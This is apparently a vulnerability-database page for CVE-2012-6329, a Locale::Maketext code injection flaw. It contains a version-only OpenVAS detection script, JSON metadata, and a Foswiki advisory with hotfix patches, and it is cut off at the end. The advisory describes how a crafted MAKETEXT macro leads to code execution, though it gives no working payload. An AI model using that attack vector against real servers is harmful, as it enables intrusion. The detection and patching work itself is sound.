Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)
2013-01-24T00:00:00
ID OPENVAS:803339 Type openvas Reporter Copyright (c) 2013 Greenbone Networks GmbH Modified 2017-05-05T00:00:00
Description
Active Perl is installed on the host and is prone to multiple
code injection vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_activeperl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $
#
# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)
#
# Authors:
# Arun kallavi <karun@secpod.com>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
## Report metadata. These strings are registered through script_tag() in the
## description block below; they carry no detection logic of their own.

## Consequence stated for a successful attack.
## NOTE(review): the wording is unconditional, while the check further down
## only compares a version string -- read the result as "potentially affected".
tag_impact = "Successful exploitation will allow attackers to execute arbitrary code on
the system.
Impact Level: System/Application";
## One-line statement of the finding.
tag_summary = "The host is installed with Active Perl and is prone to multiple
code injection vulnerabilities.";
## Remediation text.
## NOTE(review): the link points to perl.org rather than an ActivePerl download
## page -- confirm that this is the intended upgrade source for this product.
tag_solution = "Upgrade to Active Perl version 5.17.7 or later,
For updates refer to http://www.perl.org/get.html";
## Root cause as worded by the check author.
tag_insight = "An improper validation of input by the '_compile()' function which can be
exploited to inject and execute arbitrary Perl code on the system.";
## Affected range; keep it in step with the test_version used by the version
## comparison at the end of the script.
## NOTE(review): confirm that ActivePerl build numbering maps onto 5.17.7.
tag_affected = "Active Perl version prior to 5.17.7 on Windows";
if(description)
{
  ## Descriptive text shown with the result (strings are defined above).
  script_tag(name:"impact", value:tag_impact);
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  ## Identity of the check and the advisory identifiers it maps to.
  script_id(803339);
  script_version("$Revision: 6074 $");
  script_cve_id("CVE-2012-6329");
  script_bugtraq_id(56852);

  ## Severity (CVSS v2 base score and vector) and bookkeeping dates.
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $");
  script_tag(name:"creation_date", value:"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)");

  ## Detection-quality type and remediation class as declared by the author.
  ## NOTE(review): "registry" presumably reflects how the detection script
  ## obtains the version; that script is not visible here -- confirm.
  script_tag(name:"qod_type", value:"registry");
  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)");

  ## External advisories.
  script_xref(name:"URL", value:"http://secunia.com/advisories/51498");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/80566");

  ## Scheduling: category, family, and the prerequisites that gate this check.
  ## The check depends on the listed detection script and on the
  ## "ActivePerl/Ver" knowledge-base key being present.
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
  script_family("General");
  script_dependencies("gb_perl_detect_win.nasl");
  script_mandatory_keys("ActivePerl/Ver");

  ## The description pass ends here; the detection code below is not reached
  ## in this mode.
  exit(0);
}
include("version_func.inc");
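## Version-based check for CVE-2012-6329 on Windows hosts running ActivePerl.
##
## The installed version is read from the knowledge base. The key is declared
## mandatory in the description block and is presumably written by the
## detection script named in script_dependencies() -- not visible here.
apVer = get_kb_item("ActivePerl/Ver");
if(!apVer)
{
  ## Nothing to compare against; leave without reporting.
  exit(0);
}

## First release treated as fixed; must match the text in tag_affected and
## tag_solution.
fixedVer = "5.17.7";

## Caveats for whoever triages the result:
##  - Only the interpreter version is compared. The Locale::Maketext module is
##    not inspected, so a host where the module was updated or patched
##    separately from the interpreter would still be reported.
##  - NOTE(review): per the CVE description the flaw is reached through an
##    application that accepts translation strings from users; this check
##    shows that a vulnerable version is installed, not that such an
##    application is present.
if(version_is_less(version:apVer, test_version:fixedVer))
{
  ## Attach the evidence to the finding so it can be verified and so false
  ## positives can be ruled out without re-scanning.
  report = 'Installed version: ' + apVer + '\nFixed version:     ' + fixedVer + '\n';
  security_message(port:0, data:report);
  exit(0);
}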
{"id": "OPENVAS:803339", "type": "openvas", "bulletinFamily": "scanner", "title": "Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "description": "The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.", "published": "2013-01-24T00:00:00", "modified": "2017-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803339", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/51498", "http://xforce.iss.net/xforce/xfdb/80566"], "cvelist": ["CVE-2012-6329"], "lastseen": "2017-07-02T21:11:05", "viewCount": 3, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-07-02T21:11:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-6329"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12791", "SECURITYVULNS:VULN:13559", "SECURITYVULNS:DOC:30295", "SECURITYVULNS:DOC:28873", "SECURITYVULNS:DOC:29097", "SECURITYVULNS:VULN:12910"]}, {"type": "f5", "idList": ["SOL15867", "F5:K15867"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865373", "OPENVAS:1361412562310841704", "OPENVAS:1361412562310803162", "OPENVAS:841704", "OPENVAS:1361412562310803339", "OPENVAS:865373", "OPENVAS:1361412562310865275", "OPENVAS:803162", "OPENVAS:865275", "OPENVAS:1361412562310121275"]}, {"type": "gentoo", "idList": ["GLSA-201410-02"]}, {"type": "ubuntu", "idList": ["USN-2099-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:23580", "EDB-ID:23579"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119055", "PACKETSTORM:118856", "PACKETSTORM:119054"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2099-1.NASL", "AIX_PERL_ADVISORY4.NASL", "FEDORA_2013-1836.NASL", "FOSWIKI_1_1_8.NASL", "TWIKI_5_1_3.NASL", "FEDORA_2013-0659.NASL", "OPENSUSE-2013-225.NASL", "SOLARIS11_PERL-58_20130716.NASL", 
"GENTOO_GLSA-201410-02.NASL", "FEDORA_2013-0633.NASL"]}, {"type": "aix", "idList": ["PERL_ADVISORY4.ASC"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/FOSWIKI_MAKETEXT", "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT"]}, {"type": "seebug", "idList": ["SSV:60534"]}, {"type": "dsquare", "idList": ["E-304"]}, {"type": "fedora", "idList": ["FEDORA:2394F21ABD", "FEDORA:942C320E6D", "FEDORA:8ABCA212D1", "FEDORA:D263821ACF", "FEDORA:8065A20A8B"]}, {"type": "zdt", "idList": ["1337DAY-ID-20407", "1337DAY-ID-20000"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0441-1", "OPENSUSE-SU-2013:0497-1", "SUSE-SU-2013:0442-1", "OPENSUSE-SU-2013:0502-1"]}, {"type": "centos", "idList": ["CESA-2013:0685"]}, {"type": "redhat", "idList": ["RHSA-2013:0746", "RHSA-2013:0685"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0685"]}, {"type": "amazon", "idList": ["ALAS-2013-177"]}], "modified": "2017-07-02T21:11:05", "rev": 2}, "vulnersScore": 7.7}, "pluginID": "803339", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_activeperl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Arun kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\n Impact Level: System/Application\";\n\ntag_summary = \"The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.\";\ntag_solution = \"Upgrade to Active Perl version 5.17.7 or later,\n For updates refer to http://www.perl.org/get.html\";\ntag_insight = \"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\";\ntag_affected = \"Active Perl version prior to 5.17.7 on Windows\";\n\nif(description)\n{\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_id(803339);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n\n script_xref(name : \"URL\" , value : 
\"http://secunia.com/advisories/51498\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"ActivePerl/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\napVer = \"\";\n\n## Get version from KB\napVer = get_kb_item(\"ActivePerl/Ver\");\nif(apVer)\n{\n if(version_is_less(version:apVer, test_version:\"5.17.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "naslFamily": "General", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:59:57", "description": "The _compile function in Maketext.pm in the Locale::Maketext implementation in Perl before 5.17.7 does not properly handle backslashes and fully qualified method names during compilation of bracket notation, which allows context-dependent attackers to execute arbitrary commands via crafted input to an application that accepts translation strings from users, as demonstrated by the TWiki application before 5.1.3, and the Foswiki application 1.0.x through 1.0.10 and 1.1.x through 1.1.6.", "edition": 6, "cvss3": {}, "published": "2013-01-04T21:55:00", "title": "CVE-2012-6329", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6329"], "modified": "2016-12-08T03:02:00", "cpe": ["cpe:/a:perl:perl:5.13.0", "cpe:/a:perl:perl:5.14.1", "cpe:/a:perl:perl:5.12.0", "cpe:/a:perl:perl:5.11.2", "cpe:/a:perl:perl:5.13.5", "cpe:/a:perl:perl:5.12.3", "cpe:/a:perl:perl:5.13.3", "cpe:/a:perl:perl:5.11.1", "cpe:/a:perl:perl:5.16.1", "cpe:/a:perl:perl:5.13.6", "cpe:/a:perl:perl:5.11.4", "cpe:/a:perl:perl:5.13.9", "cpe:/a:perl:perl:5.14.2", "cpe:/a:perl:perl:5.13.4", "cpe:/a:perl:perl:5.13.7", "cpe:/a:perl:perl:5.10.0", "cpe:/a:perl:perl:5.12.1", "cpe:/a:perl:perl:5.13.11", "cpe:/a:perl:perl:5.11.5", "cpe:/a:perl:perl:5.10", "cpe:/a:perl:perl:5.13.1", "cpe:/a:perl:perl:5.16.0", "cpe:/a:perl:perl:5.16.2", "cpe:/a:perl:perl:5.10.1", "cpe:/a:perl:perl:5.12.2", "cpe:/a:perl:perl:5.14.3", "cpe:/a:perl:perl:5.13.8", 
"cpe:/a:perl:perl:5.11.3", "cpe:/a:perl:perl:5.13.10", "cpe:/a:perl:perl:5.11.0", "cpe:/a:perl:perl:5.13.2", "cpe:/a:perl:perl:5.14.0"], "id": "CVE-2012-6329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6329", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:perl:perl:5.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.11:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc0:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:perl:perl:5.12.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc1:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "description": "\r\n\r\n---+ Security Alert: Code injection vulnerability in MAKETEXT macro,\r\nDenial of Service vulnerability in MAKETEXT macro.\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext, which Foswiki uses to provide translations\r\nwhen {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to run arbitrary shell commands and code on the server through a\r\ncrafted %MAKETEXT% macro. 
If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam as documented in Development.SecurityAlertProcess\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll released versions of Foswiki are vulnerable to these issues\r\n\r\n - Foswiki 1.0.0 - 1.0.10\r\n - Foswiki 1.1.0 - 1.1.6\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2012-6329 to this vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\r\nCVE-2012-6330 was assigned to the Denial of Service vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6330\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary.\r\n\r\nA crafted %MAKETEXT{}% macro will pass through strings to\r\nLocale::Maketext where they are executed under the control of the CGI\r\nuser on the server. Any user with the authority to edit a topic,\r\ncomment on a topic, or execute the Foswiki rendering code (eg. The\r\nRenderPlugin) can take advantage of the vulnerability. (CVE-2012-6329)\r\n\r\nA crafted %MAKETEXT{}% macro will consume large amounts of memory and\r\nexhaust swap space. 
(CVE-2012-6330)\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server can expose the file system.\r\n\r\nA second less severe Denial of Service vulnerability is also addressed\r\nby this alert.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues:\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext.\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %<nop>MAKETEXT{}% not validating the parameter numbers\r\nsupplied in the [_nnn] tokens.\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin [_nnn] tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nOne of the following should be done as soon as possible.\r\n\r\n * Manually Apply hotfix (see patch below). __or__\r\n * Apply the\r\n[[Extensions.PatchItem12285Contrib][http://foswiki.org/Extensions/PatchItem12285Contrib]]\r\nto your Foswiki 1.1.x system (Does not apply to Foswiki 1.0.x) __or__\r\n * Disable {UserInerfaceInternationalization} in your LocalSite.cfg\r\n_(Does not protect against [[SecurityAlert-CVE-2012-6330]])_ __or__\r\n * The foswiki debian package has already been updated with the hotfix\r\n- use your preferred package management tool to update to foswiki 1.1.6-2\r\n\r\nIn addition, CPAN:Locale::Maketext version 1.23 or newer should be\r\ninstalled.\r\n\r\nUpgrade to the latest patched production Download.FoswikiRelease01x01x07\r\nonce released\r\n\r\n*The Foswiki patch fixes other issues with the %MAKETEXT% macro beyond\r\nthe code execution issue. Even if the new Locale::Maketext is installed,\r\nit is strongly recommended to apply the Foswiki patch.*\r\n\r\n\r\n---++ Hotfix for Foswiki Release 1.1.0 - 1.1.6\r\n\r\nInstall http://foswiki.org/Extensions.PatchItem12285Contrib and verify\r\nthat the patch has been applied to lib/Foswiki/Macros/MAKETEXT.pm. The\r\nextension will attempt to apply two patches, and should report that 1\r\nfile was patched. 
Only one of the patches will match your system. This\r\npatch fixes both CVE-2012-6329 CVE-2012-6330.\r\n\r\n> Running Post-install exit for PatchItem12285Contrib...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-001.patch\r\n> ...\r\n> MD5 Matched - applying patch version Foswiki 1.1.0 - 1.1.2.\r\n> Update successful for /var/www/data/Foswiki-1.1.0/lib/Foswiki/Macros/MAKETEXT.pm\r\n> .\r\n> 1 file patched\r\n> ...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-002.patch\r\n> ...\r\n> No files matched patch signatures\r\n\r\n\r\nOn a properly patched system, %MAKETEXT{" [_101] "}% should return an\r\nerror.\r\n> Excessive parameter number 101, MAKETEXT rejected. \r\n\r\nNote that this Contrib will also install the\r\nExtensions.PatchFoswikiContrib as a prerequisite. PatchFoswikiContrib\r\npatches the Extensions installer to accept the new style version strings\r\nused for modules released as of 1.1.6.\r\n\r\n---++ Hotfix for Foswiki Archived Release 1.0.0-1.0.10\r\n\r\nThis patch fixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]].\r\n\r\nThis release should be manually patched.\r\n\r\nIn Foswiki.pm, in the sub MAKETEXT\r\n\r\n============ vvv CUT vvv =============\r\n--- Foswiki.pm 2010-01-17 09:16:20.000000000 -0500\r\n+++ Foswiki.pm 2012-12-10 10:06:37.389129654 -0500\r\n@@ -4200,6 +4200,9 @@\r\n $str =~\r\n s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+ return "Illegal parameter number" if ($max > 100);\r\n+ $str =~ s#\\#\\\\#g;\r\n+\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || "";\r\n\r\n============ ---CUT--- =============\r\n\r\n\r\n---++ Manual patch for Foswiki Release 1.1.0 -> 1.1.6\r\n\r\nInstalling the Extensions.PatchItem12285Contrib is the best way to patch\r\nyour system - you can however see the patch we apply here. 
This patch\r\nfixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]]:\r\n\r\n============ vvv CUT vvv =============\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:51:12.959268829 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:37:31.674486503 -0500\r\n @@ -4,9 +4,19 @@\r\n use strict;\r\n use warnings;\r\n+use Locale::Maketext;\r\n+my $escape =\r\n+ ( $Foswiki::cfg{UserInterfaceInternationalisation}\r\n+ && $Locale::Maketext::VERSION\r\n+ && $Locale::Maketext::VERSION < 1.23 );\r\n+\r\n sub MAKETEXT {\r\n my ( $this, $params ) = @_;\r\n+ my $max;\r\n+ my $min;\r\n+ my $param_error;\r\n+\r\n my $str = $params->{_DEFAULT} || $params->{string} || "";\r\n return "" unless $str;\r\n 
@@ -18,15 +28,22 @@\r\n $str =~ s/~~\[/~[/g;\r\n $str =~ s/~~\]/~]/g;\r\n+ $max = 0;\r\n+ $min = 1;\r\n+ $param_error = 0;\r\n+\r\n # unescape parameters and calculate highest parameter number:\r\n- my $max = 0;\r\n- $str =~ s/~\[(\_(\d+))~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+ $str =~ s/~\[(\_(\d+))~\]/_validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n $str =~\r\n-s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ _validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n+ return $str if ($param_error);\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || "";\r\n+ # Escape any escapes.\r\n+ $str =~ s#\\#\\\\#g if ($escape); # escape any escapes\r\n+\r\n my @args = split( /\s*,\s*/, $argsStr );\r\n # fill omitted args with empty strings\r\n@@ -47,6 +64,26 @@\r\n return $result;\r\n }\r\n+sub _validate {\r\n+\r\n+ #my ( $contents, $number, $max, $min, $param_error ) = @_\r\n+\r\n+ $_[2] = $_[1] if ( $_[1] > $_[2] ); # Record maximum param number\r\n+ $_[3] = $_[1] if ( $_[1] < $_[3] ); # Record minimum param number\r\n+\r\n+ if ( $_[1] > 100 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+"<span class=\"foswikiAlert\">Excessive parameter number $_[2],\r\nMAKETEXT rejected.</span>";\r\n+ }\r\n+ if ( $_[1] < 1 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+"<span class=\"foswikiAlert\">Invalid parameter <code>\"$_[0]\"</code>,\r\nMAKETEXT rejected.</span>";\r\n+ }\r\n+ return "[$_[0]]"; # Return the complete bracket parameter\r\nwithout escapes\r\n+}\r\n+\r\n 1;\r\n __END__\r\n Foswiki - The Free and Open Source Wiki, http://foswiki.org/\r\n\r\n============ ^^^ CUT ^^^ =============\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2012-12-05 - The Locale::Maketext vulnerability was discussed on\r\nthe Perl5Porters email list, triggered review of Foswiki code.\r\n * 2012-12-05 - Patched version (1.23) of Locale::Maketext is released.\r\n * 2012-12-08 - The 
[_999999] DoS issue identified and sent to foswiki\r\nsecurity list.\r\n * 2012-12-09 - The "remote execution" vulnerability in\r\nLocale::Maketext was confirmed on Foswiki.\r\n * 2012-12-09 - Requested the CVE from cve-assign@mitre.org.\r\n * 2012-12-09 - TWiki notified of the Vulnerability.\r\n * 2012-12-10 - Developer fixes code (George Clark) and security team\r\nvalidates the fixes.\r\n * 2012-12-10 - Extensions.PatchItem12285Contrib released for Foswiki\r\n1.1.x\r\n * 2012-12-10 - Security team creates advisory with hotfix.\r\nAnnouncement delayed for coordination with TWiki (George Clark)\r\n * 2012-12-12 - Updated Debian packages released (Sven Dowideit)\r\n * 2012-12-12 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists ( )\r\n * 2012-12-14 - Publish advisory in Support web and update all related\r\ntopics ( )\r\n * 2012-12-14 - Reference to public advisory on Download page and\r\nKnown Issues ( )\r\n * 2012-xx-xx - Release Manager builds patch release ( )\r\n * 2012-xx-xx - Issue a public security advisory (vuln@secunia.com,\r\ncert@cert.org, bugs@securitytracker.com,\r\nfull-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org) ( )\r\n", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:DOC:28873", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28873", "title": "Foswiki Security Alert CVE-2012-6329, CVE-2012-6330 Remote code execution and other vulnerabilities in MAKETEXT macro", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "It's possible to call external functions on template compilation", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:VULN:13559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13559", "title": 
